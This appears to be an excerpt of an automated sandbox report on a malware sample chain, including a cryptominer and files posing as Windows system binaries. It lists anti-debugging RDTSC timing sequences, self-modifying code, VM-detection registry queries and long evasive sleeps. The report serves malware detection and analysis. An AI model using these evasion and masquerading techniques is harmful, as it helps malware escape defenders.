                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC096B second address: 4CC096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC096F second address: 4CC0975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0975 second address: 4CC09DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF624B4E7DAh 0x00000014 or ecx, 6A234FA8h 0x0000001a jmp 00007FF624B4E7DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF624B4E7E8h 0x00000026 adc ecx, 2A5FC208h 0x0000002c jmp 00007FF624B4E7DBh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70598 second address: 4C70612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007FF624C752FBh 0x0000000b or ax, 51EEh 0x00000010 jmp 00007FF624C75309h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov al, dh 0x0000001d movzx esi, di 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FF624C752FBh 0x00000027 mov ebp, esp 0x00000029 jmp 00007FF624C75306h 0x0000002e push FFFFFFFEh 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FF624C75307h 0x00000037 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70612 second address: 4C7069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FF624B4E7D9h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF624B4E7DCh 0x00000015 or si, 5888h 0x0000001a jmp 00007FF624B4E7DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF624B4E7E8h 0x00000026 sbb si, BAE8h 0x0000002b jmp 00007FF624B4E7DBh 0x00000030 popfd 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007FF624B4E7E2h 0x0000003b mov edx, esi 0x0000003d popad 0x0000003e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7069B second address: 4C70756 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 mov bh, 12h 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 mov edx, 38A5083Eh 0x0000001c pushfd 0x0000001d jmp 00007FF624C752FFh 0x00000022 or ah, FFFFFFEEh 0x00000025 jmp 00007FF624C75309h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF624C75301h 0x00000035 pop eax 0x00000036 pushad 0x00000037 call 00007FF624C752FCh 0x0000003c call 00007FF624C75302h 0x00000041 pop ecx 0x00000042 pop edx 0x00000043 mov di, si 0x00000046 popad 0x00000047 call 00007FF624C752F9h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF624C75309h 0x00000053 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70756 second address: 4C70766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70766 second address: 4C707AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF624C75309h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF624C75303h 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C707AC second address: 4C707B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Tries to evade debugger and weak emulator (self modifying code)
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9CED45 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B7000E instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B70386 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B97678 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B75F1A instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BF1ABC instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: C8ED45 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E3000E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E30386 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E57678 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E35F1A instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: EB1ABC instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeMemory allocated: 850000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeMemory allocated: 1B410000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 850000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\services64.exeMemory allocated: 17C0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\services64.exeMemory allocated: 1B8B0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\services64.exeMemory allocated: C60000 memory reserve | memory write watch
                        Source: C:\Windows\System32\services64.exeMemory allocated: 1B3C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 1B5C0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeMemory allocated: CA0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeMemory allocated: 1B220000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: D40000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeMemory allocated: 1B3E0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeMemory allocated: CB0000 memory reserve | memory write watch
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC0942 rdtsc 0_2_04CC0942
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,7_2_00401B3F
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\services64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\services64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599854
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599716
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599534
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599285
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599127
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598988
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598850
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598734
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598625
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598515
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599803
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599687
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599552
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599436
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599327
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599217
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599108
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 632Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 367Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 641Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 570Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2894
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6915
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7641
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1925
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8008
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1292
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7248
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2363
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8090
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8107
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8396
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeWindow / User API: threadDelayed 1418
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8604
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 492
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeWindow / User API: threadDelayed 579
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeWindow / User API: threadDelayed 1064
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9208
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6049
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3564
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7996
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1373
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6750
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2914
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeDropped PE file which has not been started: C:\Windows\System32\Microsoft\Libs\WR64.sysJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3132Thread sleep time: -54027s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6036Thread sleep count: 632 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6036Thread sleep time: -1264632s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3568Thread sleep count: 367 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3568Thread sleep time: -11010000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4852Thread sleep time: -1080000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180Thread sleep count: 641 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180Thread sleep time: -1282641s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1544Thread sleep count: 570 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1544Thread sleep time: -1140570s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 5944Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 7212Thread sleep count: 34 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe TID: 7212Thread sleep time: -1020000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe TID: 7696Thread sleep time: -570000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe TID: 7532Thread sleep time: -120000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe TID: 1436Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 2894 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 6915 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 7641 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600Thread sleep count: 1925 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 2740Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 8008 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep count: 1292 > 30
                        Source: C:\Windows\System32\services64.exe TID: 5960Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep count: 7248 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep count: 2363 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\services64.exe TID: 888Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep count: 8090 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep count: 8107 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2784Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep count: 8396 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep count: 133 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6412Thread sleep count: 1418 > 30
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599854s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599716s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599534s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599285s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -599127s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598988s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598850s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598734s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598625s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6436Thread sleep time: -598515s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6904Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6748Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 6868Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 3748Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 8604 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 492 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6452Thread sleep count: 579 > 30
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599803s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 6452Thread sleep count: 1064 > 30
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599687s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599552s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599436s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599327s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599217s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 8120Thread sleep time: -599108s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 2812Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe TID: 7820Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 7896Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe TID: 1984Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep count: 9208 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 6049 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 3564 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6712Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep count: 7996 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep count: 1373 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4364Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240Thread sleep count: 6750 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240Thread sleep count: 2914 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 396Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
